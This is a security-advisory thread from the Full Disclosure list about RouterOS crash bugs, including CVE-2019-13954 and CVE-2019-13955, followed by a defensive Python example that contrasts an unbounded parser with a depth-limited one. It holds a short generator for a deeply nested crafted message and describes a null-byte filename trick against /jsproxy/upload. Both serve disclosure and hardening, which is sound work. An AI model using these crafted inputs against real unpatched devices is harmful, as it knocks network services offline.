> Product: MikroTik's RouterOS
> Affected Versions: before 6.44.6 (Long-term release tree)
> Fixed Versions: 6.44.6 (Long-term release tree)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as
> switches, routers and access points.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> long-term release tree when found. Maybe other release trees also suffer
> from these issues.
>
> 1. The console process suffers from a memory corruption issue.
> An authenticated remote user can crash the console process due to a NULL
> pointer reference by sending a crafted packet.
>
> 2. The console process suffers from an assertion failure issue. There is a
> reachable assertion in the console process. An authenticated remote user
> can crash the console process due to assertion failure by sending a crafted
> packet.
>
> Solution
> 
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>


[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-01-07 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.6 (Long-term release tree)
Fixed Versions: 6.44.6 (Long-term release tree)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
long-term release tree when found. Maybe other release trees also suffer
from these issues.

1. The console process suffers from a memory corruption issue.
An authenticated remote user can crash the console process due to a NULL
pointer reference by sending a crafted packet.

2. The console process suffers from an assertion failure issue. There is a
reachable assertion in the console process. An authenticated remote user
can crash the console process due to assertion failure by sending a crafted
packet.

Solution


Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree



[FD] Two vulnerabilities found in MikroTik's RouterOS

2019-07-23 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: before 6.44.5 (Long-term release tree),
   before 6.45.1 (Stable release tree)
Fixed Versions: 6.44.5 (Long-term release tree),
6.45.1 (Stable release tree)
Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree
Vendor Status: fixed version released
CVE: CVE-2019-13954, CVE-2019-13955
Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Details of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
6.42.11 and 6.43.16 (Long-term release tree) when found.


1. CVE-2019-13954: memory exhaustion via a crafted POST request
This vulnerability is similar to CVE-2018-1157. An authenticated user
can cause the www binary to consume all memory via a crafted POST request
to /jsproxy/upload. It's because of the incomplete fix for the
CVE-2018-1157.

Based on the poc for cve_2018_1157 provided by @Jacob Baines (really
appreciated!), crafting a filename ending with many '\x00' can bypass the
original fix to trigger the vulnerability.


2. CVE-2019-13955: stack exhaustion via recursive parsing of JSON
This vulnerability is similar to CVE-2018-1158. An authenticated user
communicating with the www binary can trigger a stack exhaustion
vulnerability via recursive parsing of JSON containing message type M.

Based on the poc for cve_2018_1158 provided by @Jacob Baines (really
appreciated!), crafting a JSON message with type M can trigger the
vulnerability. A simple python script to generate the crafted message is as
follows.

msg = "{M01:[M01:[]]}"
for _ in range(2000):
    msg = msg.replace('[]', "[M01:[]]")


Solution


Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1
(Stable release tree).


References
==

[1] https://mikrotik.com/download/changelogs/long-term-release-tree
[2] https://github.com/tenable/routeros

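
CVE-2019-13955 above has the classic shape of a recursion-depth bug: the parser's recursion is bounded only by how deeply the input nests, so a message built by the three-line generator in the advisory walks the parser off its stack. The block below is an added example, not the advisory's or RouterOS's code. It reproduces the generator and runs its output against two parsers for an assumed, simplified grammar of the {M01:[M01:[]]} shape (a stand-in for the real format, not RouterOS's grammar): one that recurses freely, and a hardened one that carries an explicit depth counter and rejects input beyond MAX_DEPTH (32, a value chosen for the example) before descending any further. In Python the unbounded parser fails with a RecursionError; in a native process such as the www binary the same recursion exhausts the thread's stack and the process dies.

```python
import re
from typing import Callable, Dict, Optional

# Assumed, simplified grammar for the {M01:[M01:[]]} shape quoted above: a message
# is a '{...}' or '[...]' list of KEY:VALUE fields whose VALUE is itself a '[...]'
# message. It is a stand-in for the real format, not RouterOS's grammar.
Message = Dict[str, "Message"]
MAX_DEPTH = 32  # example value; a real parser needs a documented, tested limit
_KEY = re.compile(r"[A-Za-z0-9_]+")


def build_nested(rounds: int) -> str:
    """The advisory's generator: every round wraps the innermost [] one level deeper."""
    msg = "{M01:[M01:[]]}"
    for _ in range(rounds):
        msg = msg.replace("[]", "[M01:[]]")
    return msg


class _Parser:
    def __init__(self, text: str, max_depth: Optional[int]):
        self.s, self.i, self.max_depth = text, 0, max_depth

    def peek(self) -> str:
        return self.s[self.i] if self.i < len(self.s) else ""

    def expect(self, ch: str) -> None:
        if self.peek() != ch:
            raise ValueError(f"expected {ch!r} at offset {self.i}")
        self.i += 1

    def message(self, depth: int, open_ch: str, close_ch: str) -> Message:
        # Hardened path: refuse before descending, so a 2000-level message costs
        # at most MAX_DEPTH frames instead of one frame per level of input.
        if self.max_depth is not None and depth > self.max_depth:
            raise ValueError(f"nesting depth exceeds {self.max_depth}")
        self.expect(open_ch)
        fields: Message = {}
        while self.peek() != close_ch:
            m = _KEY.match(self.s, self.i)
            if not m:
                raise ValueError(f"expected key at offset {self.i}")
            self.i = m.end()
            self.expect(":")
            fields[m.group()] = self.message(depth + 1, "[", "]")  # one frame per level
            if self.peek() == ",":
                self.i += 1
        self.expect(close_ch)
        return fields

    def parse(self) -> Message:
        msg = self.message(1, "{", "}")
        if self.i != len(self.s):
            raise ValueError(f"trailing data at offset {self.i}")
        return msg


def parse_unbounded(text: str) -> Message:
    """Depth bounded only by the interpreter: the pattern behind CVE-2019-13955."""
    return _Parser(text, None).parse()


def parse_bounded(text: str) -> Message:
    """Hardened: an explicit depth cap turns stack exhaustion into a parse error."""
    return _Parser(text, MAX_DEPTH).parse()


def nesting_depth(msg: Message) -> int:
    """Number of nested message levels in a parsed result (the outer braces count as 1)."""
    return 1 + max((nesting_depth(v) for v in msg.values()), default=0)


def try_parse(parser: Callable[[str], Message], text: str) -> str:
    """Run a parser and report the outcome as text, so both variants can be compared."""
    try:
        parser(text)
        return "ok"
    except RecursionError:
        return "RecursionError"
    except ValueError as exc:
        return f"ValueError: {exc}"


if __name__ == "__main__":
    crafted = build_nested(2000)
    print("unbounded:", try_parse(parse_unbounded, crafted))
    print("bounded:  ", try_parse(parse_bounded, crafted))
```

The depth check sits at the top of message(), before the recursive call, so the rejection costs a constant number of frames however long the input is; a check placed after recursion returns would still have consumed the stack. The same structure applies to any recursive-descent parser of untrusted input: either carry a depth counter or rewrite the descent with an explicit, bounded work list.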